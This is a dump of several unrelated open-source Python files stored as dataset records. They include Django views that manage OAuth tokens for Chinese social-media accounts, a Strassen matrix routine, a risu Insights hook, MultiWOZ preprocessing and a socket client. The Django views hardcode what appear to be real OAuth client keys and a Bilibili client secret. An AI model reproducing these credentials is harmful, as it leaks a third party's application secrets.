timedelta(days=60)).strftime(\n \"%Y-%m-%d %H:%M:%S\"\n )\n app_id = result[\"data\"][\"user\"][\"app_id\"]\n\n user_info_dict = {\n \"nickname\": nickname,\n \"avatar\": avatar,\n \"expires_time\": expires_time,\n \"auth_time\": auth_time,\n \"uid_id\": uid,\n \"bduss\": bduss,\n \"token\": token,\n \"bjhstoken\": bjhstoken,\n }\n exists = models.PlatFormBaiJiaHao.objects.filter(app_id=app_id).exists()\n if exists:\n models.PlatFormBaiJiaHao.objects.filter(app_id=app_id).update(\n **user_info_dict\n )\n else:\n user_info_dict[\"app_id\"] = app_id\n models.PlatFormBaiJiaHao.objects.create(**user_info_dict)\n\n return redirect(\"/account/auth/list/\")\n\n\ndef account_auth_get(request):\n \"\"\"获取授权账号表格数据\"\"\"\n\n # 
获取当前登陆的用户uid\n uid = request.session.get(\"info\").get(\"uid\")\n\n row_id = 0\n data = {\"total\": 0, \"rows\": []}\n\n queryset_dy = models.PlatFormDouYin.objects.filter(uid=uid)\n for index, item in enumerate(queryset_dy):\n data[\"total\"] += index\n row_id += 1\n content = {\n \"id\": row_id,\n \"platform\": \"抖音\",\n \"nickname\": item.nickname,\n \"avatar\": item.avatar,\n \"auth_time\": item.auth_time,\n \"expires_time\": item.expires_in,\n \"status\": item.expires_in > datetime.now(),\n \"open_id\": item.open_id,\n }\n\n data[\"rows\"].append(content)\n\n queryset_bz = models.PlatFormBilibili.objects.filter(uid=uid)\n for index, item in enumerate(queryset_bz):\n data[\"total\"] += index\n row_id += 1\n content = {\n \"id\": row_id,\n \"platform\": \"哔哩哔哩\",\n \"nickname\": item.nickname,\n \"avatar\": item.avatar,\n \"auth_time\": item.auth_time,\n \"expires_time\": item.expires_in,\n \"status\": item.expires_in > datetime.now(),\n \"openid\": item.openid,\n }\n\n data[\"rows\"].append(content)\n\n queryset_zh = models.PlatFormZhiHu.objects.filter(uid=uid)\n for index, item in enumerate(queryset_zh):\n data[\"total\"] += index\n row_id += 1\n\n content = {\n \"id\": row_id,\n \"platform\": \"知乎\",\n \"nickname\": item.nickname,\n \"avatar\": item.avatar,\n \"auth_time\": item.auth_time,\n \"expires_time\": item.expires_time,\n \"status\": item.expires_time > datetime.now(),\n \"zh_uid\": item.zh_uid,\n }\n\n data[\"rows\"].append(content)\n\n queryset_bjh = models.PlatFormBaiJiaHao.objects.filter(uid=uid)\n for index, item in enumerate(queryset_bjh):\n data[\"total\"] += index\n row_id += 1\n\n content = {\n \"id\": row_id,\n \"platform\": \"百家号\",\n \"nickname\": item.nickname,\n \"avatar\": item.avatar,\n \"auth_time\": item.auth_time,\n \"expires_time\": item.expires_time,\n \"status\": item.expires_time > datetime.now(),\n \"app_id\": item.app_id,\n }\n\n data[\"rows\"].append(content)\n\n return JsonResponse(data)\n\n\ndef account_delete(request):\n \"\"\"删除授权账号\"\"\"\n\n delete_id = request.GET.get(\"delete_id\")\n\n dy_query = Q(open_id=delete_id)\n zh_query = Q(zh_uid=delete_id)\n bjh_query = Q(app_id=delete_id)\n bz_query = Q(openid=delete_id)\n\n # 利用 Q 对象,可以在一个查询中检查多个条件\n exists_dy = models.PlatFormDouYin.objects.filter(dy_query).exists()\n exists_zh = models.PlatFormZhiHu.objects.filter(zh_query).exists()\n exists_bjh = models.PlatFormBaiJiaHao.objects.filter(bjh_query).exists()\n exists_bz = models.PlatFormBilibili.objects.filter(bz_query).exists()\n\n if exists_dy:\n models.PlatFormDouYin.objects.filter(dy_query).delete()\n return JsonResponse({\"status\": True})\n elif exists_zh:\n models.PlatFormZhiHu.objects.filter(zh_query).delete()\n return JsonResponse({\"status\": True})\n elif exists_bjh:\n models.PlatFormBaiJiaHao.objects.filter(bjh_query).delete()\n return JsonResponse({\"status\": True})\n elif exists_bz:\n models.PlatFormBilibili.objects.filter(bz_query).delete()\n return JsonResponse({\"status\": True})\n\n return JsonResponse({\"status\": False})\n\n\ndef account_data_list(request):\n \"\"\"数据展示\"\"\"\n\n # 前端选中标签\n active_account_data = \"\"\n header_label = \"\"\n if request.path == \"/account/data/list/\":\n active_account_data = \"active\"\n header_label = \"数据展示\"\n\n context = {\"active_account_data\": active_account_data, \"header_label\": header_label}\n return render(request, \"account_data_list.html\", context)\n\n\ndef account_data_get(request):\n \"\"\"获取授权账号数据表格数据\"\"\"\n\n # 获取当前登陆的用户uid\n uid = 
request.session.get(\"info\").get(\"uid\")\n\n row_id = 0\n data = {\"total\": 0, \"rows\": []}\n\n # 抖音数据发送到前端\n queryset = models.PlatFormData.objects.filter(uid=uid)\n for index, item in enumerate(queryset):\n row_id += 1\n data[\"total\"] += index\n content = {\n \"id\": row_id,\n \"platform\": item.platform,\n \"nickname\": item.nickname,\n \"type\": item.type,\n \"create_time\": item.create_time,\n \"title\": item.title,\n \"update_time\": item.update_time,\n \"like_count\": item.like_count,\n \"comment_count\": item.comment_count,\n \"play_count\": item.play_count,\n \"download_rec_count\": item.download_rec_count,\n \"share_vote_count\": item.share_vote_count,\n \"forward_collect_count\": item.forward_collect_count,\n \"share_url\": item.share_url,\n }\n data[\"rows\"].append(content)\n\n return JsonResponse(data)\n\n\ndef account_data_update(request):\n \"\"\"更新数据到数据库\"\"\"\n\n # 获取当前用户ID\n uid = request.session.get(\"info\").get(\"uid\")\n\n gd = GetData()\n\n dy_param = []\n dy_queryset = models.PlatFormDouYin.objects.filter(uid=uid)\n for item in dy_queryset:\n open_id = item.open_id\n access_token = item.access_token\n nickname = item.nickname\n uid = item.uid\n dy_param.append(\n {\n \"nickname\": nickname,\n \"open_id\": open_id,\n \"access_token\": access_token,\n \"uid\": uid,\n }\n )\n\n bz_param = []\n bz_queryset = models.PlatFormBilibili.objects.filter(uid=uid)\n for item in bz_queryset:\n openid = item.openid\n access_token = item.access_token\n nickname = item.nickname\n uid = item.uid\n bz_param.append(\n {\n \"nickname\": nickname,\n \"openid\": openid,\n \"access_token\": access_token,\n \"uid\": uid,\n }\n )\n\n zh_param = []\n zh_queryset = models.PlatFormZhiHu.objects.filter(uid=uid)\n for item in zh_queryset:\n z_c0 = item.z_c0\n zh_uid = item.zh_uid\n nickname = item.nickname\n uid = item.uid\n zh_param.append(\n {\"nickname\": nickname, \"z_c0\": z_c0, \"zh_uid\": zh_uid, \"uid\": uid}\n )\n\n bjh_param = []\n bjh_queryset = models.PlatFormBaiJiaHao.objects.filter(uid=uid)\n for item in bjh_queryset:\n bjhstoken = item.bjhstoken\n bduss = item.bduss\n token = item.token\n app_id = item.app_id\n nickname = item.nickname\n uid = item.uid\n bjh_param.append(\n {\n \"nickname\": nickname,\n \"bjhstoken\": bjhstoken,\n \"bduss\": bduss,\n \"token\": token,\n \"app_id\": app_id,\n \"uid\": uid,\n }\n )\n\n for param in dy_param:\n gd.get_douyin_data(\n param[\"nickname\"], param[\"open_id\"], param[\"access_token\"], param[\"uid\"]\n )\n for param in bz_param:\n gd.get_bilibili_data(\n param[\"nickname\"], param[\"access_token\"], param[\"openid\"], param[\"uid\"]\n )\n for param in zh_param:\n gd.get_zhihu_data(\n param[\"nickname\"], param[\"z_c0\"], param[\"zh_uid\"], param[\"uid\"]\n )\n for param in bjh_param:\n gd.get_baijiahao_data(\n param[\"nickname\"],\n param[\"bjhstoken\"],\n param[\"bduss\"],\n param[\"token\"],\n param[\"app_id\"],\n param[\"uid\"],\n )\n\n # 创建或更新数据\n for item in gd.works_list:\n exists = models.PlatFormData.objects.filter(item_id=item[\"item_id\"]).exists()\n if exists:\n models.PlatFormData.objects.filter(item_id=item[\"item_id\"]).update(**item)\n else:\n models.PlatFormData.objects.create(**item)\n\n # 判断原始数据有没有删除\n sql_item_id_list: list[tuple] = list(\n models.PlatFormData.objects.values_list(\"item_id\")\n ) # [(\"item_id\",),(\"item_id\",)]\n sql_item_id_list = [i[0] for i in sql_item_id_list] # [\"item_id\"]\n source_item_id_list = []\n for item in gd.works_list:\n source_item_id_list.append(item[\"item_id\"])\n 
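# Reconcile deletions: any item_id still in our table but missing from the\n    # fresh pull was removed on the source platform, so drop it locally too.\n    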
sql_item_id_set = set(sql_item_id_list)\n source_item_id_set = set(source_item_id_list)\n difference_id = sql_item_id_set - source_item_id_set\n for item_id in difference_id:\n models.PlatFormData.objects.filter(item_id=item_id).delete()\n\n return JsonResponse({\"status\": True})\n\n\ndef account_auth_refresh(request):\n \"\"\"刷新refresh_token\"\"\"\n\n refresh_id = request.GET.get(\"refresh_id\")\n\n exists_zh = models.PlatFormZhiHu.objects.filter(zh_uid=refresh_id).exists()\n if exists_zh:\n data = {\n \"status\": False,\n \"data\": {\"stats\": \"刷新失败\", \"tips\": \"知乎账号刷新无效,如已过期,请删除后重新授权\"},\n }\n return JsonResponse(data)\n\n exists_bjh = models.PlatFormBaiJiaHao.objects.filter(app_id=refresh_id).exists()\n if exists_bjh:\n data = {\n \"status\": False,\n \"data\": {\"stats\": \"刷新失败\", \"tips\": \"百家号账号刷新无效,如已过期,请删除后重新授权\"},\n }\n return JsonResponse(data)\n\n exists_dy = models.PlatFormDouYin.objects.filter(open_id=refresh_id).exists()\n if exists_dy:\n row_object = models.PlatFormDouYin.objects.filter(open_id=refresh_id).first()\n rft_data = {\n \"refresh_token\": row_object.refresh_token,\n \"client_key\": \"awpswfd65m22r59e\",\n }\n rft_response = requests.post(\n \"https://open.douyin.com/oauth/renew_refresh_token/\", data=rft_data\n )\n rft_response_data = rft_response.json().get(\"data\", \"\")\n rft_response_message = rft_response.json().get(\"message\", \"\")\n\n if rft_response_message == \"success\":\n models.PlatFormDouYin.objects.filter(open_id=refresh_id).update(\n refresh_token=rft_response_data.get(\"refresh_token\")\n )\n act_data = {\n \"client_key\": \"awpswfd65m22r59e\",\n \"grant_type\": \"refresh_token\",\n \"refresh_token\": rft_response_data.get(\"refresh_token\"),\n }\n act_response = requests.post(\n \"https://open.douyin.com/oauth/refresh_token/\", data=act_data\n )\n act_response_data = act_response.json().get(\"data\", \"\")\n act_response_message = act_response.json().get(\"message\")\n\n if act_response_message:\n access_token = act_response_data[\"access_token\"]\n expires_in = act_response_data[\"expires_in\"]\n expires_time = datetime.now() + timedelta(seconds=expires_in)\n expires_time = datetime.strftime(expires_time, \"%Y-%m-%d %H:%M:%S\")\n\n models.PlatFormDouYin.objects.filter(open_id=refresh_id).update(\n access_token=access_token, expires_in=expires_time\n )\n nickname = (\n models.PlatFormDouYin.objects.filter(open_id=refresh_id)\n .first()\n .nickname\n )\n data = {\n \"status\": True,\n \"data\": {\"stats\": \"刷新成功\", \"tips\": f\"{nickname}将在{expires_time}后过期\"},\n }\n return JsonResponse(data)\n\n data = {\n \"status\": False,\n \"data\": {\"stats\": \"刷新失败\", \"tips\": \"refresh_token过期,请删除授权账号重新授权\"},\n }\n return JsonResponse(data)\n\n exists_bz = models.PlatFormBilibili.objects.filter(openid=refresh_id).exists()\n if exists_bz:\n row_object = models.PlatFormBilibili.objects.filter(openid=refresh_id).first()\n rft_data = {\n \"refresh_token\": row_object.refresh_token,\n \"client_id\": \"302763bae0404eee\",\n \"client_secret\": \"aef73864a09a42bcbe1bbec8130ee5ed\",\n \"grant_type\": \"refresh_token\",\n }\n rft_response = requests.post(\n \"https://api.bilibili.com/x/account-oauth2/v1/refresh_token\", data=rft_data\n )\n rft_response_data = rft_response.json().get(\"data\", \"\")\n rft_response_code = rft_response.json().get(\"code\", \"\")\n\n if rft_response_code == 0:\n models.PlatFormBilibili.objects.filter(openid=refresh_id).update(\n refresh_token=rft_response_data.get(\"refresh_token\"),\n 
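# rotate the stored credentials in one UPDATE: the new refresh token plus\n                # the new access token and its expiry (converted below from a unix timestamp)\n                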
access_token=rft_response_data.get(\"access_token\"),\n expires_in=datetime.utcfromtimestamp(\n rft_response_data.get(\"expires_in\")\n ).strftime(\"%Y-%m-%d %H:%M:%S\"),\n )\n nickname = (\n models.PlatFormBilibili.objects.filter(openid=refresh_id)\n .first()\n .nickname\n )\n expires_time = (\n models.PlatFormBilibili.objects.filter(openid=refresh_id)\n .first()\n .expires_in\n )\n data = {\n \"status\": True,\n \"data\": {\"stats\": \"刷新成功\", \"tips\": f\"{nickname}将在{expires_time}后过期\"},\n }\n return JsonResponse(data)\n\n data = {\n \"status\": False,\n \"data\": {\"stats\": \"刷新失败\", \"tips\": \"refresh_token过期,请删除授权账号重新授权\"},\n }\n return JsonResponse(data)\n\n\ndef account_auth_detail(request):\n \"\"\"授权账号详情\"\"\"\n\n # 前端选中标签与头部标签\n active_account_auth = \"active\" if request.path == \"/account/auth/detail/\" else \"\"\n\n # 获取当前用户ID与当前平台账号 ID\n uid = request.session.get(\"info\").get(\"uid\")\n platform_uid = request.GET.get(\"platformid\", \"\")\n fields = [\n \"like_count\",\n \"comment_count\",\n \"play_count\",\n \"download_rec_count\",\n \"share_vote_count\",\n \"forward_collect_count\",\n ]\n data_dict = {}\n for field in fields:\n queryset = (\n models.PlatFormData.objects.filter(uid_id=uid)\n .filter(platform_uid=platform_uid)\n .aggregate(Sum(field))\n )\n data_dict.update(queryset)\n\n # 修改头部平台名称+账号昵称\n platform_info = models.PlatFormData.objects.filter(\n platform_uid=platform_uid\n ).first()\n nickname = platform_info.nickname\n platform = platform_info.platform\n platform_mapping = {\n 1: \"抖音\",\n 2: \"知乎\",\n 3: \"百家号\",\n 4: \"哔哩哔哩\",\n }\n platform_name = platform_mapping.get(platform, \"\")\n header_label = f\"{platform_name}-{nickname}\"\n\n context = {\n \"platform_uid\": platform_uid,\n \"active_account_auth\": active_account_auth,\n \"header_label\": header_label,\n \"data\": data_dict,\n }\n\n return render(request, \"account_auth_detail.html\", context)\n\n\ndef account_auth_detail_echarts(request):\n \"\"\"账号详情图表\"\"\"\n # 获取当前用户ID与当前平台账号 ID\n uid = request.session.get(\"info\", {}).get(\"uid\")\n platform_uid = request.GET.get(\"platform_uid\", \"\")\n\n # 获取指定平台的历史数据\n queryset = models.HistoryDate.objects.filter(uid=uid, platform_uid=platform_uid)\n\n # 提取日期和指标列表\n date = queryset.values_list(\"date\", flat=True)\n metrics = [\n \"like_sum\",\n \"comment_sum\",\n \"play_sum\",\n \"download_rec_sum\",\n \"share_vote_sum\",\n \"forward_collect_sum\",\n ]\n\n # 初始化空的 series_dict\n series_dict = {\n metric: list(queryset.values_list(metric, flat=True)) for metric in metrics\n }\n\n backend_data = {\n \"categories\": [i.strftime(\"%Y-%m-%d\") for i in date],\n \"seriesData\": series_dict,\n }\n\n return JsonResponse({\"status\": True, \"backendData\": backend_data})\n","repo_name":"HoveyChenB612/GrowthVision","sub_path":"mainsite/views/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":29224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"11783509461","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Carlos Romera de Blas, Matemática y Física, AlCP-2\n\"\"\"\nimport random as rnd\nimport matplotlib.pyplot as plt\nimport time\n\n# Suma de matrices\ndef suma(A,B):\n n=len(A)\n C=[]\n for i in range(n):\n C.append([])\n for j in range (n):\n C[i].append(0) \n C[i][j]=A[i][j]+B[i][j] \n return C\n\n# Resta de matrices\ndef resta(A,B):\n n=len(A)\n C=[]\n for i in range(n):\n C.append([])\n for j in range (n):\n C[i].append(0) \n C[i][j]=A[i][j]-B[i][j] \n return C\n\n# 
Multiplicación de Strassen:\ndef mult_strassen(A,B):\n n=len(A)\n if n == 1:\n return [[A[0][0]*B[0][0]]]\n impar=n%2!=0\n if(impar):\n for i in range (n):\n A[i]=A[i]+[0]\n B[i]=B[i]+[0]\n A=A+[[0]*(n+1)]\n B=B+[[0]*(n+1)]\n n+=1\n \n A11, A12, A21, A22= [], [], [], []\n B11, B12, B21, B22= [], [], [], []\n for i in range((n//2)):\n A11 = A11 + [A[i][:(n//2)]]\n B11 = B11 + [B[i][:(n//2)]]\n \n A12 = A12 + [A[i][(n//2):]]\n B12 = B12 + [B[i][(n//2):]]\n \n A21 = A21 + [A[(n//2) + i][:(n//2)]]\n B21 = B21 + [B[(n//2) + i][:(n//2)]]\n \n A22 = A22 + [A[(n//2) + i][(n//2):]]\n B22 = B22 + [B[(n//2) + i][(n//2):]]\n \n M1=mult_strassen(suma(A11,A22),suma(B11,B22))\n M2=mult_strassen(suma(A21,A22),B11)\n M3=mult_strassen(A11,resta(B12,B22))\n M4=mult_strassen(A22,resta(B21,B11))\n M5=mult_strassen(suma(A11,A12),B22)\n M6=mult_strassen(resta(A21,A11),suma(B11,B12))\n M7=mult_strassen(resta(A12,A22),suma(B21,B22))\n \n C11=suma(resta(suma(M1,M4),M5),M7)\n C12=suma(M3,M5)\n C21=suma(M2,M4)\n C22=suma(suma(resta(M1,M2),M3),M6)\n\n C1, C2 = [], []\n for i in range((n//2)):\n C1 = C1 + [C11[i] + C12[i]]\n C2 = C2 + [C21[i] + C22[i]]\n C = C1 + C2\n\n if(impar):\n for i in range (n):\n C[i].pop()\n C.pop()\n \n return C\n\n# Programa para ver visualmente el tamaño de las matrices \n# frente al tiempo que tarda en multiplicarlas:\ndef grafica():\n mindigs = 1\n maxdigs = 50\n digstep = 1\n \n numdigs = []\n tiempos = []\n \n n = mindigs\n while n <= maxdigs:\n A = []\n B = []\n for i in range(n):\n A.append([])\n B.append([])\n for j in range (n):\n A[i].append(rnd.uniform(-1000.0,1000.0))\n B[i].append(rnd.uniform(-1000.0,1000.0))\n\n\n ini = time.time()\n mult_strassen(A, B)\n fin = time.time()\n numdigs += [n]\n t = fin-ini\n tiempos += [t]\n n += digstep\n \n plt.plot(numdigs, tiempos, \"g-\")\n plt.grid(b=True, which='major',axis='both', color='w', linestyle='--', linewidth=0.7)\n plt.xlabel('n=len(A)=len(B)')\n plt.ylabel('tiempo [seg]')\n ax = plt.gca()\n ax.set_facecolor((0.0, 0.0, 0.0))\n plt.savefig(\"mult_strassen.png\")\n plt.show()\n plt.clf()","repo_name":"KRomera/Computational-Algebra","sub_path":"actividad4.py","file_name":"actividad4.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"22410908606","text":"from __future__ import print_function\n\nimport glob\nimport json\nimport os\n\ntry:\n import risuclient.shell as risu\nexcept:\n import shell as risu\n\n# Load i18n settings from risu\n_ = risu._\n\nextension = \"__file__\"\npluginsdir = os.path.join(risu.risudir, \"plugins\", extension)\n\n\ndef init():\n \"\"\"\n Initializes module\n :return: List of triggers for extension\n \"\"\"\n return []\n\n\ndef run(data, quiet=False, options=None): # do not edit this line\n \"\"\"\n Executes plugin\n :param quiet: be more silent on returned information\n :param data: data to process\n :return: returncode, out, err\n \"\"\"\n\n skipped = int(os.environ[\"RC_SKIPPED\"])\n failed = int(os.environ[\"RC_FAILED\"])\n\n jsons = glob.glob(os.path.join(os.environ[\"RISU_ROOT\"], \"insights-*.json\"))\n mydata = []\n for insijson in jsons:\n filenamewithpath = insijson\n if (\n os.path.exists(filenamewithpath)\n and os.path.isfile(filenamewithpath)\n and os.access(filenamewithpath, os.R_OK)\n ):\n with open(filenamewithpath) as json_file:\n for line in json_file.readlines():\n try:\n mydata = json.loads(line)\n except:\n risu.LOG.debug(\n \"Error processing dataline in %s, skipping\" % json_file\n 
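# malformed or truncated data lines are tolerated: they are logged at\n                        # debug level and scanning continues with the next line\n                        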
)\n if mydata and isinstance(mydata, dict):\n pass\n else:\n mydata = []\n\n else:\n mydata = []\n\n # Fill plugins with actual report received\n if \"reports\" in mydata:\n for plugin in mydata[\"reports\"]:\n # Fake plugin entries to integrate into 'data' dictionary\n pluginid = risu.calcid(plugin[\"component\"])\n data[pluginid] = {}\n data[pluginid][\"id\"] = pluginid\n data[pluginid][\"plugin\"] = \"%s.%s\" % (insijson, plugin[\"component\"])\n if \"links\" in plugin and \"kcs\" in plugin[\"links\"]:\n if isinstance(plugin[\"links\"][\"kcs\"], str):\n data[pluginid][\"kb\"] = plugin[\"links\"][\"kcs\"].split()\n elif isinstance(plugin[\"links\"][\"kcs\"], list):\n data[pluginid][\"kb\"] = \" \".join(plugin[\"links\"][\"kcs\"])\n else:\n data[pluginid][\"kb\"] = \"\"\n data[pluginid][\"category\"] = \"insights\"\n data[pluginid][\"hash\"] = pluginid\n data[pluginid][\"backend\"] = \"insights-core-unifier-merge-loader\"\n data[pluginid][\"name\"] = \"%s-%s\" % (insijson, plugin[\"rule_id\"])\n data[pluginid][\"result\"] = {}\n data[pluginid][\"result\"][\"err\"] = \"%s\" % plugin[\"details\"]\n data[pluginid][\"result\"][\"rc\"] = failed\n data[pluginid][\"result\"][\"out\"] = \"\"\n data[pluginid][\"priority\"] = 666\n # Fill empty values for missing fields\n for key in [\n \"description\",\n \"bugzilla\",\n \"path\",\n \"time\",\n \"long_name\",\n \"subcategory\",\n ]:\n data[pluginid][\"%s\" % key] = \"\"\n\n # Process plugins in skip to fake skipped entries\n if \"skips\" in mydata:\n for plugin in mydata[\"skips\"]:\n pluginid = risu.calcid(plugin[\"rule_fqdn\"])\n data[pluginid] = {}\n data[pluginid][\"id\"] = pluginid\n data[pluginid][\"plugin\"] = \"insights.%s\" % plugin[\"rule_fqdn\"]\n data[pluginid][\"category\"] = \"insights\"\n data[pluginid][\"hash\"] = pluginid\n data[pluginid][\"backend\"] = \"insights-core-unifier-merge-loader\"\n data[pluginid][\"name\"] = plugin[\"rule_fqdn\"]\n data[pluginid][\"result\"] = {}\n data[pluginid][\"result\"][\"err\"] = \"%s\" % plugin[\"reason\"]\n data[pluginid][\"result\"][\"rc\"] = skipped\n data[pluginid][\"result\"][\"out\"] = \"\"\n data[pluginid][\"priority\"] = 666\n # Fill empty values for missing fields\n for key in [\n \"description\",\n \"bugzilla\",\n \"path\",\n \"time\",\n \"long_name\",\n \"subcategory\",\n \"kb\",\n ]:\n data[pluginid][\"%s\" % key] = \"\"\n\n return data\n\n\ndef help(): # do not edit this line\n \"\"\"\n Returns help for plugin\n :return: help text\n \"\"\"\n\n commandtext = _(\n \"This hook proceses insights json to integrate them in risu results\"\n )\n return commandtext\n","repo_name":"risuorg/risu","sub_path":"risuclient/hooks/data/0/insights-core-unifier-merge-loader/insights-json.py","file_name":"insights-json.py","file_ext":"py","file_size_in_byte":4821,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"83"} +{"seq_id":"35008280901","text":"import json\n\n# post-processing on the actions/statuses\ndef postprocess(li):\n ret = []\n for s in li:\n if 'inform none' in s.lower():\n continue\n ret.append(s.lower().replace('select','ask-for-selection').replace(' none','').replace('choice','num_choices').replace('user','USER').replace('system','SYSTEM'))\n if len(ret) == 0:\n ret = ['NONE']\n ret = list(dict.fromkeys(ret)) # deduplicate\n return ret\n\n# converts a list of actions/statuses into a list of indices from an \"all\" list that contains all the actions/statuses\ndef listtoindex(li,all):\n return [all.index(x) for x in li]\n\n# the main function 
that post-processes the multiwoz dataset that supports multi-domains\ndef preprocess_multiwoz(datajson,trainlist,devlist,testlist,domain,namelist,outjson):\n    \"\"\"\n    datajson: the path to a json file that contains the multiwoz data\n    trainlist: list of ids of training dialogs\n    devlist: list of ids of dev dialogs\n    testlist: list of ids of test dialogs\n    domain: the domain to obtain trajectories for\n    namelist: the list of ids of dialogs that belongs to this domain\n    outjson: the json file to output the processed trajectories to\n    \"\"\"\n    datas = json.load(open(datajson))\n    allacts = []\n    allstatuses = []\n    alltrajs = []\n    domains = []\n    nums = [0,0,0]\n    counter = 0\n    out = {'option_labels':allacts,'subtask_labels':allstatuses,'num_subtask':len(allstatuses),'num_option':len(allacts),'trajectories':alltrajs}\n    for name in datas:\n        if name.lower() not in delexjson:\n            print('warning: not found in delex '+name)\n            continue\n        if name+'_0' not in namelist:\n            continue\n        dialog = datas[name]\n        possible = []\n        for g in dialog['new_goal']:\n            possible.append(g)\n        \n        dialogmulti = [(len(dialog['log']),None)]\n        startpoint = 0\n        if name[0:3] in ['SNG','SSN','WOZ'] and len(dialogmulti) > 1:\n            # we print a warning if we find actions from multiple domains in a supposed single-domain dialog\n            print('Warning '+name)\n        for idx,multi in enumerate(dialogmulti):\n            endpt,dom = multi\n\n            # a few dialogs have messed up endings, we only use the non-messed-up parts\n            if name == 'SNG1213.json':\n                endpt = 12\n            if name == 'PMUL0237.json':\n                endpt = 29\n            if name == 'PMUL0382.json':\n                endpt = 21\n\n            actslist = []\n            for turn in dialog['log'][startpoint:endpt]:\n                speaker = 'user'\n                if len(turn['metadata']) > 0:\n                    speaker = 'system'\n                acts = []\n                bookstatus = None\n                offerstatus = True\n                for actname in turn['dialog_act']:\n                    for lis in turn['dialog_act'][actname]:\n                        acnames = actname.split('-')\n                        if acnames[1] == 'Recommend':\n                            acnames[1] = 'Inform'\n                        if acnames[1] == 'NoOffer':\n                            acnames[1] = 'no-offer'\n                            offerstatus = False\n                            acts.append(speaker+' '+acnames[0]+'-'+acnames[1])\n                        elif actname == 'Booking-Inform':\n                            if speaker == 'system':\n                                acnames[1] = 'OfferBook'\n                            else:\n                                acnames[1] = 'Want-to-book'\n                            acts.append(speaker+' '+acnames[0]+'-'+acnames[1])\n                            acts.append(speaker+' '+acnames[0]+'-Inform '+lis[0])\n                        elif acnames[0] == 'Booking' and acnames[1] != 'Request':\n                            bookstatus = (acnames[1] == 'Book')\n                            acts.append('system '+acnames[0]+'-'+acnames[1])\n                            if bookstatus:\n                                acts.append('system '+acnames[0]+'-Inform '+lis[0])\n                        else:\n                            acts.append(speaker+' '+acnames[0]+'-'+acnames[1]+' '+lis[0])\n                acts = postprocess(acts)\n                for act in acts:\n                    if act not in allacts:\n                        allacts.append(act)\n                actslist.append([acts,turn['text'],bookstatus,offerstatus,speaker])\n            for i in range(len(actslist)):\n                a,b,c,o,d = actslist[i]\n                statuses = []\n                for act in a:\n                    statuses.append('status '+act)\n                if d == 'user' and i < len(actslist)-1:\n                    _,_,cc,oo,_ = actslist[i+1]\n                    if cc is not None:\n                        if cc:\n                            statuses.append('status can book')\n                        else:\n                            statuses.append('status cannot book')\n                    if not oo:\n                        statuses.append('status no available offer')\n                for s in statuses:\n                    if s not in allstatuses:\n                        allstatuses.append(s)\n                actslist[i].append(statuses)\n            if name in trainlist:\n                split='train'\n                nums[0] += 1\n            elif name in devlist:\n                split='val'\n                nums[1] += 1\n            elif name in testlist:\n                split='test'\n                nums[2] += 1\n            else:\n                print(name+' not in train, val or test set')\n                continue\n            so=[]\n            soindices=[]\n            traj = {'name':name, 'split' : 
split,'subtasks_and_options':so,'subtask_and_option_indices':soindices}\n if dom not in domains:\n domains.append(dom)\n for i,(o,utter,_,_,speaker,s) in enumerate(actslist):\n delexed = getdelex(name,startpoint + i)\n if delexed is None:\n continue\n so.append(['option',o,utter,delexed])\n so.append(['subtask',s])\n soindices.append(['option',listtoindex(o,allacts)])\n soindices.append(['subtask',listtoindex(s,allstatuses)])\n alltrajs.append(traj)\n startpoint = endpt\n print(len(alltrajs))\n print(nums)\n print(counter)\n f=open(outjson,'w+')\n\n json.dump({domain:out},f,indent=2)\n\n\n# obtain delexicalized dialog utterances for E2E evaluation purposes\ndelexjson = json.load(open('../datasets/MultiWOZ/data_for_galaxy.json'))\ndef getdelex(name,num):\n delexdict = delexjson[name.lower()]\n tn = num // 2\n speaker = 'user_delex'\n if num > tn * 2:\n speaker = 'resp'\n try:\n return delexdict['log'][tn][speaker]\n except:\n print(\"warning\")\n print(name)\n print(num)\n return None\n\nimport torch\nif __name__=='__main__':\n # load list of dialog ids from each split\n trainlist,vallist,testlist = torch.load('../datasets/MultiWOZ/splitlists.pt')\n # load list of dialog ids from each domain combination\n namelists = json.load(open('../datasets/MultiWOZ/Domains.json'))\n for domain in namelists:\n if domain in ['police','hospital']:\n continue\n nl3 = namelists[domain]\n namelist = nl3['train']+nl3['val']+nl3['test']\n preprocess_multiwoz('../../MultiWOZ2_3/data.json',trainlist,vallist,testlist,domain.lower(),namelist,'../datasets/MultiWOZ/trajectories/'+domain+'_trajectories.json')\n\n\n\n\n\n\n\n \n \n \n \n \n \n\n \n\n \n\n\n\n\n","repo_name":"srsohn/TOD-Flow","sub_path":"src/preprocessing/preprocess_data_multiwoz_multi.py","file_name":"preprocess_data_multiwoz_multi.py","file_ext":"py","file_size_in_byte":7600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"35674868281","text":"# -*- coding: utf-8 -*-\nimport sys\nimport random\nimport socket\nimport argparse\nfrom helper import send, receive\n\ndef main(host, port):\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n client.connect((host, port))\n print(f\"Connecting to {host}:{port}...\")\n while True:\n receive_buf = receive(client)\n print(f\"[*] Receive from server({host}:{port}): {receive_buf.decode('utf-8')}\")\n message = input(\">> \")\n send(client, message.encode(\"utf-8\"))\n except Exception as e:\n print(f\"[-] Error: {e}\")\n client.close()\n\ndef parse_options():\n parser = argparse.ArgumentParser(usage='%(prog)s [options]',\n description='Socket client @Qin',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=\n'''\nExamples:\npython socket_client.py -h localhost -p 8888\n'''\n )\n parser.add_argument('-t','--host', type=str, default=\"localhost\")\n parser.add_argument('-p','--port', type=int, default=8888)\n args = parser.parse_args()\n return args\n\nif __name__ == \"__main__\":\n args = parse_options()\n main(args.host, args.port)\n","repo_name":"ariesduanmu/games","sub_path":"net_games/tcp_proxy/socket_client.py","file_name":"socket_client.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"32687184807","text":"from datetime import datetime\n\nfrom django.shortcuts import render\nimport pymysql\nfrom django.core.paginator import Paginator\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\nfrom 
